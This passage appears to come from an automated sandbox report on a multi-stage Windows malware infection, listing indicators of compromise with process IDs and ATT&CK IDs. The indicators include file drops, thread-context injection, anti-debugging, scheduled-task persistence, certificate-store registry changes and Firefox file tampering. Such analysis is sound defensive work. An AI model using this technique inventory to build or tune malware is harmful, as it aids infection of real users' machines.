File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	OklvlTo.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Setup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	OklvlTo.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	OklvlTo.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 48 IoCs

pid	Process
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
5056	JJECAAEHCF.exe
4208	explorti.exe
4824	67f535e337.exe
5224	explorti.exe
3512	explorti.exe
5528	explorti.exe
3480	explorti.exe
5692	explorti.exe
5240	explorti.exe
6004	explorti.exe
5308	explorti.exe
1548	explorti.exe
5448	4Iy1KUXaumS5KWIhCg2YizTi.exe
5448	4Iy1KUXaumS5KWIhCg2YizTi.exe
1892	explorti.exe
1304	explorti.exe
1848	explorti.exe
4896	explorti.exe
976	explorti.exe
2016	explorti.exe
6036	explorti.exe
6016	explorti.exe
4948	explorti.exe
2836	explorti.exe
5324	explorti.exe
3324	explorti.exe
4912	explorti.exe
5076	explorti.exe
3876	explorti.exe
2924	explorti.exe
1064	explorti.exe
5840	explorti.exe
480	explorti.exe
1564	explorti.exe
5764	explorti.exe
5732	explorti.exe
6036	explorti.exe
3400	explorti.exe
2760	explorti.exe
5608	explorti.exe
5368	explorti.exe
3404	explorti.exe
868	explorti.exe
648	explorti.exe
3656	explorti.exe

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 2848 set thread context of 4468	2848	cJGyky9EhCckJumZf6fkM6G5.exe	100
PID 2324 set thread context of 3656	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe	104
PID 1916 set thread context of 2124	1916	cFb2c7uKqYcOaECU8XsTAIef.exe	107
PID 564 set thread context of 772	564	5XopSKg9PUSZohSIWN2v9xOT.exe	108
PID 1096 set thread context of 3736	1096	dz_LhQg5VnMy0wlI_6dK0bLe.exe	128
PID 1472 set thread context of 3056	1472	eqtpkqwqodik.exe	159
PID 1472 set thread context of 1448	1472	eqtpkqwqodik.exe	161
PID 5756 set thread context of 5864	5756	BFCFBFBFBK.exe	244
PID 6004 set thread context of 6040	6004	KFIJJJEBGC.exe	246
PID 3580 set thread context of 1496	3580	abQaeBLwmX9V57tLKTE3eOuX.exe	475
PID 5832 set thread context of 2236	5832	kJjL0w6C70s0bwCeRI5o95qa.exe	476
PID 2364 set thread context of 3020	2364	sxM96ISlNbOtGCb6tmhTPqMM.exe	477
PID 6048 set thread context of 2956	6048	7NybowgkTtFNZ6zV5tAShfiu.exe	478
PID 5504 set thread context of 1612	5504	cRS5O_os57KVEKl2I6n_mlOZ.exe	480

Drops file in Program Files directory 26 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\RmqlacUQU\DhfJYe.dll	OklvlTo.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	OklvlTo.exe
File created	C:\Program Files (x86)\XYcGyWaqnbhU2\jYoplUh.xml	OklvlTo.exe
File created	C:\Program Files (x86)\qioMUrUoKCErC\uXNJzhu.xml	OklvlTo.exe
File created	C:\Program Files (x86)\IFfyxFxqzCUn\jmDFIQL.dll	OklvlTo.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	OklvlTo.exe
File created	C:\Program Files (x86)\qioMUrUoKCErC\ljPXgIk.dll	OklvlTo.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	AXChDNl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	AXChDNl.exe
File created	C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\nUdthBM.xml	AXChDNl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	OklvlTo.exe
File created	C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\pXidBiU.dll	OklvlTo.exe
File created	C:\Program Files (x86)\nXmjFVOHU\CUgSrT.dll	AXChDNl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	AXChDNl.exe
File created	C:\Program Files (x86)\utOkvPMviNUn\TfUqMOF.dll	AXChDNl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	OklvlTo.exe
File created	C:\Program Files (x86)\ANKVsfPAuVEU2\KCIUBgQSlrRTq.dll	AXChDNl.exe
File created	C:\Program Files (x86)\tuyZfYaPCcjxC\peMRHIb.dll	AXChDNl.exe
File created	C:\Program Files (x86)\RmqlacUQU\QCNqlOa.xml	OklvlTo.exe
File created	C:\Program Files (x86)\XYcGyWaqnbhU2\uDthzfaJGYZeg.dll	OklvlTo.exe
File created	C:\Program Files (x86)\ANKVsfPAuVEU2\IGnJJps.xml	AXChDNl.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	OklvlTo.exe
File created	C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\ZcvXHny.xml	OklvlTo.exe
File created	C:\Program Files (x86)\nXmjFVOHU\tKdeIZH.xml	AXChDNl.exe
File created	C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\ARZbTyR.dll	AXChDNl.exe
File created	C:\Program Files (x86)\tuyZfYaPCcjxC\mOuiFMl.xml	AXChDNl.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\fxxmGIjnSbKlnnNZc.job	schtasks.exe
File created	C:\Windows\Tasks\ZNzITvxeQRflwsDJD.job	schtasks.exe
File created	C:\Windows\Tasks\JHXYugTugXnbcjp.job	schtasks.exe
File created	C:\Windows\Tasks\bIOEZkRAagKtMyjtNl.job	schtasks.exe
File created	C:\Windows\Tasks\beIeSqxTUIgkrqSZzo.job	schtasks.exe
File created	C:\Windows\Tasks\explorti.job	JJECAAEHCF.exe
File created	C:\Windows\Tasks\LOHPKuWKJcOzSYPZu.job	schtasks.exe
File created	C:\Windows\Tasks\ayCOowYLgjutNKI.job	schtasks.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5480	sc.exe
4288	sc.exe
4880	sc.exe
3416	sc.exe
3996	sc.exe
2348	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
5456	5204	WerFault.exe	180
2008	5180	WerFault.exe	179
2364	5104	WerFault.exe	111
664	6072	WerFault.exe	263
2284	1492	WerFault.exe	112
2044	648	WerFault.exe	360

Checks processor information in registry 2 TTPs 36 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	QwpLixYOI92BLmCZFEhE6Mbs.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	QwpLixYOI92BLmCZFEhE6Mbs.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
3600	timeout.exe
1984	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	OklvlTo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	AXChDNl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	OklvlTo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	AXChDNl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b1167767-0000-0000-0000-d01200000000}\MaxCapacity = "14116"	OklvlTo.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	AXChDNl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5224	schtasks.exe
3656	schtasks.exe
4972	schtasks.exe
4092	schtasks.exe
1072	schtasks.exe
4552	schtasks.exe
2252	schtasks.exe
3552	schtasks.exe
5152	schtasks.exe
3156	schtasks.exe
5292	schtasks.exe
5568	schtasks.exe
1212	schtasks.exe
1156	schtasks.exe
1376	schtasks.exe
2640	schtasks.exe
5996	schtasks.exe
2304	schtasks.exe
2036	schtasks.exe
5216	schtasks.exe
560	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1184	Setup.exe
1184	Setup.exe
1784	Setup.exe
1784	Setup.exe
1916	cFb2c7uKqYcOaECU8XsTAIef.exe
1916	cFb2c7uKqYcOaECU8XsTAIef.exe
1916	cFb2c7uKqYcOaECU8XsTAIef.exe
1916	cFb2c7uKqYcOaECU8XsTAIef.exe
1916	cFb2c7uKqYcOaECU8XsTAIef.exe
1916	cFb2c7uKqYcOaECU8XsTAIef.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
3656	MSBuild.exe
3656	MSBuild.exe
4208	powershell.exe
772	RegAsm.exe
4468	RegAsm.exe
4468	RegAsm.exe
4468	RegAsm.exe
4468	RegAsm.exe
4208	powershell.exe
236	powershell.exe
236	powershell.exe
236	powershell.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
3656	MSBuild.exe
3656	MSBuild.exe
5056	JJECAAEHCF.exe
5056	JJECAAEHCF.exe
4468	RegAsm.exe
4208	explorti.exe
4208	explorti.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
1472	eqtpkqwqodik.exe
1472	eqtpkqwqodik.exe
1472	eqtpkqwqodik.exe
1472	eqtpkqwqodik.exe
1472	eqtpkqwqodik.exe
1472	eqtpkqwqodik.exe
1472	eqtpkqwqodik.exe
1472	eqtpkqwqodik.exe
3656	MSBuild.exe
3656	MSBuild.exe
3656	MSBuild.exe
3656	MSBuild.exe
2124	MSBuild.exe
2124	MSBuild.exe
2124	MSBuild.exe
2124	MSBuild.exe
5224	explorti.exe
5224	explorti.exe
5372	powershell.exe
5372	powershell.exe
5372	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1916	cFb2c7uKqYcOaECU8XsTAIef.exe
Token: SeDebugPrivilege	2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe
Token: SeDebugPrivilege	772	RegAsm.exe
Token: SeBackupPrivilege	772	RegAsm.exe
Token: SeSecurityPrivilege	772	RegAsm.exe
Token: SeSecurityPrivilege	772	RegAsm.exe
Token: SeSecurityPrivilege	772	RegAsm.exe
Token: SeSecurityPrivilege	772	RegAsm.exe
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeIncreaseQuotaPrivilege	1496	WMIC.exe
Token: SeSecurityPrivilege	1496	WMIC.exe
Token: SeTakeOwnershipPrivilege	1496	WMIC.exe
Token: SeLoadDriverPrivilege	1496	WMIC.exe
Token: SeSystemProfilePrivilege	1496	WMIC.exe
Token: SeSystemtimePrivilege	1496	WMIC.exe
Token: SeProfSingleProcessPrivilege	1496	WMIC.exe
Token: SeIncBasePriorityPrivilege	1496	WMIC.exe
Token: SeCreatePagefilePrivilege	1496	WMIC.exe
Token: SeBackupPrivilege	1496	WMIC.exe
Token: SeRestorePrivilege	1496	WMIC.exe
Token: SeShutdownPrivilege	1496	WMIC.exe
Token: SeDebugPrivilege	1496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1496	WMIC.exe
Token: SeRemoteShutdownPrivilege	1496	WMIC.exe
Token: SeUndockPrivilege	1496	WMIC.exe
Token: SeManageVolumePrivilege	1496	WMIC.exe
Token: 33	1496	WMIC.exe
Token: 34	1496	WMIC.exe
Token: 35	1496	WMIC.exe
Token: 36	1496	WMIC.exe
Token: SeDebugPrivilege	236	powershell.exe
Token: SeIncreaseQuotaPrivilege	1496	WMIC.exe
Token: SeSecurityPrivilege	1496	WMIC.exe
Token: SeTakeOwnershipPrivilege	1496	WMIC.exe
Token: SeLoadDriverPrivilege	1496	WMIC.exe
Token: SeSystemProfilePrivilege	1496	WMIC.exe
Token: SeSystemtimePrivilege	1496	WMIC.exe
Token: SeProfSingleProcessPrivilege	1496	WMIC.exe
Token: SeIncBasePriorityPrivilege	1496	WMIC.exe
Token: SeCreatePagefilePrivilege	1496	WMIC.exe
Token: SeBackupPrivilege	1496	WMIC.exe
Token: SeRestorePrivilege	1496	WMIC.exe
Token: SeShutdownPrivilege	1496	WMIC.exe
Token: SeDebugPrivilege	1496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1496	WMIC.exe
Token: SeRemoteShutdownPrivilege	1496	WMIC.exe
Token: SeUndockPrivilege	1496	WMIC.exe
Token: SeManageVolumePrivilege	1496	WMIC.exe
Token: 33	1496	WMIC.exe
Token: 34	1496	WMIC.exe
Token: 35	1496	WMIC.exe
Token: 36	1496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4952	WMIC.exe
Token: SeSecurityPrivilege	4952	WMIC.exe
Token: SeTakeOwnershipPrivilege	4952	WMIC.exe
Token: SeLoadDriverPrivilege	4952	WMIC.exe
Token: SeSystemProfilePrivilege	4952	WMIC.exe
Token: SeSystemtimePrivilege	4952	WMIC.exe
Token: SeProfSingleProcessPrivilege	4952	WMIC.exe
Token: SeIncBasePriorityPrivilege	4952	WMIC.exe
Token: SeCreatePagefilePrivilege	4952	WMIC.exe
Token: SeBackupPrivilege	4952	WMIC.exe
Token: SeRestorePrivilege	4952	WMIC.exe
Token: SeShutdownPrivilege	4952	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
200	Klk_ndJuZUINtD72UfY7IaBv.tmp
5056	JJECAAEHCF.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
2212	b9fcde3053.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
2212	b9fcde3053.exe
